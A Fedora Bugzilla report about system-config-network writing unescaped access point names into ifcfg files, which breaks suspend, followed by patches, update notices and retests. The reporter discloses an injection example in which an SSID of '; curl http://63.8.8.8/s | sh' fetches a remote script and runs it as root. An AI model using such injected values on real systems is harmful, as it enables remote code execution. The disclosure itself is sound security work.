Bug 846081

Summary: Saving in system-config-network-gui can stop suspend from working (EXPLOITABLE).
Product: [Fedora] Fedora Reporter: Mitch Davis <mjd+redhat>
Component: system-config-networkAssignee: Harald Hoyer <harald>
Status: CLOSED CURRENTRELEASE QA Contact: Fedora Extras Quality Assurance <extras-qa>
Severity: low Docs Contact:
Priority: unspecified    
Version: 16CC: cdemills, harald, jpopelka, nstrug
Target Milestone: ---   
Target Release: ---   
Hardware: Unspecified   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2012-09-03 22:53:31 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Mitch Davis 2012-08-06 18:57:42 UTC 
Recently my F16 laptop stopped suspending.  Because there were no suspend-related messages in dmesg, my theory was that the kernel was never being told to suspend.  Therefore it was likely that something in userspace was aborting the suspend.

I looked in /var/log/pm-suspend.log and found this:

/usr/lib64/pm-utils/sleep.d/55NetworkManager suspend suspend: success.
Running hook /usr/lib64/pm-utils/sleep.d/56dhclient suspend suspend:
./ifcfg-Auto_McDonald's: line 13: unexpected EOF while looking for matching `''
./ifcfg-Auto_McDonald's: line 16: syntax error: unexpected end of file

/usr/lib64/pm-utils/sleep.d/56dhclient suspend suspend: Returned exit code 2.
Mon Aug  6 20:18:04 HKT 2012: Inhibit found, will not perform suspend
Mon Aug  6 20:18:04 HKT 2012: Running hooks for resume

Here are the contents of /etc/sysconfig/networking/devices/ifcfg-Auto_McDonald\'s:

ESSID=McDonald\'s
MODE=Managed
TYPE=Wireless
BOOTPROTO=dhcp
DEFROUTE=yes
PEERDNS=yes
PEERROUTES=yes
IPV4_FAILURE_FATAL=yes
NAME="Auto McDonald\'s"
UUID=26c40faf-dda2-4332-a2c6-6efd1d0da9d1
ONBOOT=yes
USERS=mjd
DEVICE=Auto_McDonald's
IPV6INIT=no
USERCTL=no

The problem is the unescaped single quote in the DEVICE line, which when the file is sourced, is going to produce the above error message.

I spoke to the NetworkManager people, and they tell me that nm doesn't write a DEVICE= line, that something else must have done it.

I had a look at all the files in /etc/sysconfig/networking/devices, and the timestamps are all the same.  Then I remembered I ran system-config-network-gui at that time, and selected File->Save.  It seems that system-config-network-gui writes a DEVICE= line, and as a value, plugs in the name of the ifcfg file.  The problem is that this value isn't escaped.

Note, this could be used as a remote exploit: Someone could put a script at /s on host 63.8.8.8, then set an access point name to be:

; curl http://63.8.8.8/s | sh

The line in ifcfg would then be:

  DEVICE=Auto_; curl http://63.8.8.8/s | sh

And this would run "curl http://63.8.8.8/s" (and hence the script from that server) as root.

Is this what we want?  No it isn't!  Can you fix this bug please?
Comment 1 Jiri Popelka 2012-08-07 13:26:11 UTC 
(In reply to comment #0)
> I spoke to the NetworkManager people, and they tell me that nm doesn't write
> a DEVICE= line, that something else must have done it.

Then the easiest would be to not write the DEVICE= line with system-config-network as well.



/usr/share/system-config-network/netconfpkg/NCDevice.py
@@ -555,6 +555,9 @@ class Device(Device_base):
         if conf.has_key('RESOLV_MODS'):
             del conf['RESOLV_MODS']
 
+        if conf.has_key('DEVICE'):
+            del conf['DEVICE']
+
         conf.write()
Comment 2 Fedora Update System 2012-08-07 14:41:54 UTC 
system-config-network-1.6.4-1.fc17 has been submitted as an update for Fedora 17.
https://admin.fedoraproject.org/updates/system-config-network-1.6.4-1.fc17
Comment 3 Fedora Update System 2012-08-07 14:51:30 UTC 
system-config-network-1.6.4-1.fc16 has been submitted as an update for Fedora 16.
https://admin.fedoraproject.org/updates/system-config-network-1.6.4-1.fc16
Comment 4 Mitch Davis 2012-08-08 01:33:18 UTC 
Hello guys,

Thanks for your attention to this bug.  I think it's not just DEVICE, but the NAME (and possibly ESSID) field as well.  I had to hand-escape NAME in order to get suspend working again.
Comment 5 Fedora Update System 2012-08-09 22:52:31 UTC 
Package system-config-network-1.6.4-1.fc17:
* should fix your issue,
* was pushed to the Fedora 17 testing repository,
* should be available at your local mirror within two days.
Update it with:
# su -c 'yum update --enablerepo=updates-testing system-config-network-1.6.4-1.fc17'
as soon as you are able to.
Please go to the following url:
https://admin.fedoraproject.org/updates/FEDORA-2012-11561/system-config-network-1.6.4-1.fc17
then log in and leave karma (feedback).
Comment 6 Mitch Davis 2012-08-10 02:15:04 UTC 
I've tried the new RPMs, writing out the ifcfg files now seems ok, even if there's a single quote in the access point name.

Thanks!
Comment 7 Mitch Davis 2012-08-12 13:10:38 UTC 
After more testing, I think it is still broken.

[root@xiaomao mjd]# rpm -q system-config-network
system-config-network-1.6.4-1.fc16.noarch

[root@xiaomao mjd]# pm-suspend
[root@xiaomao mjd]# 

Looking in /var/log/pm-suspend:

Running hook /usr/lib64/pm-utils/sleep.d/56dhclient suspend suspend:
./ifcfg-Auto_McDonald's_FREE_WiFi: line 1: unexpected EOF while looking for matching `''
./ifcfg-Auto_McDonald's_FREE_WiFi: line 15: syntax error: unexpected end of file

[root@xiaomao mjd]# cat -n "/etc/sysconfig/network-scripts/ifcfg-Auto_McDonald's_FREE_WiFi"
     1	ESSID='McDonald's FREE WiFi'
     2	MODE=Managed
     3	TYPE=Wireless
     4	BOOTPROTO=dhcp
     5	DEFROUTE=yes
     6	PEERDNS=yes
     7	PEERROUTES=yes
     8	IPV4_FAILURE_FATAL=yes
     9	NAME="Auto McDonalds FREE WiFi"
    10	UUID=9230369f-2073-4e61-8a6f-c73f363bfb2b
    11	ONBOOT=yes
    12	USERS=mjd
    13	IPV6INIT=no
    14	USERCTL=no
[root@xiaomao mjd]# 

Very obviously, ESSID='McDonald's FREE WiFi' is wrong, and needs fixing.

Can you have another look at it please?
Comment 8 Jiri Popelka 2012-08-16 07:44:32 UTC 
*** Bug 802711 has been marked as a duplicate of this bug. ***
Comment 9 Mitch Davis 2012-08-16 08:40:34 UTC 
This bug is NOT FIXED yet.  Just saying, so as no-one assumed that it's been fixed and closes it.
Comment 10 Jiri Popelka 2012-08-16 12:20:04 UTC 
Can you test this scratch build ?
http://koji.fedoraproject.org/koji/taskinfo?taskID=4395239

It contains this change:
http://git.fedorahosted.org/cgit/system-config-network.git/commit/?id=ff0d27f08890f3ae3a8705f003c67f7caeb2d90a
Comment 11 Jiri Popelka 2012-08-22 12:23:10 UTC 
system-config-network-1.6.5-1 was pushed to the Fedora 16 + 17 testing repository

Update with:
# su -c 'yum update --enablerepo=updates-testing system-config-network*'
Comment 12 Fedora Update System 2012-09-03 22:53:31 UTC 
system-config-network-1.6.5-1.fc17 has been pushed to the Fedora 17 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 13 Pascal Dupuis 2012-09-06 21:13:08 UTC 
I filled bug report 848089, which is quite similar. Here's the 
/etc/sysconfig/network-scripts/ifcfg-McDonald\'s_France:

HWADDR=9C:B7:0D:FE:0F:62
ESSID="McDonald\'s France"
MODE=Managed
TYPE=Wireless
BOOTPROTO=dhcp
DEFROUTE=yes
PEERDNS=yes
PEERROUTES=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_PEERDNS=yes
IPV6_PEERROUTES=yes
IPV6_FAILURE_FATAL=no
IPV6_PRIVACY=rfc3041
NAME="McDonald\'s France"
UUID=363b88bf-15ed-4d54-9ede-8d174032cfac
ONBOOT=yes


Regards

Pascal
Comment 14 Fedora Update System 2012-11-22 03:52:43 UTC 
system-config-network-1.6.5-1.fc16 has been pushed to the Fedora 16 stable repository.  If problems still persist, please make note of it in this bug report.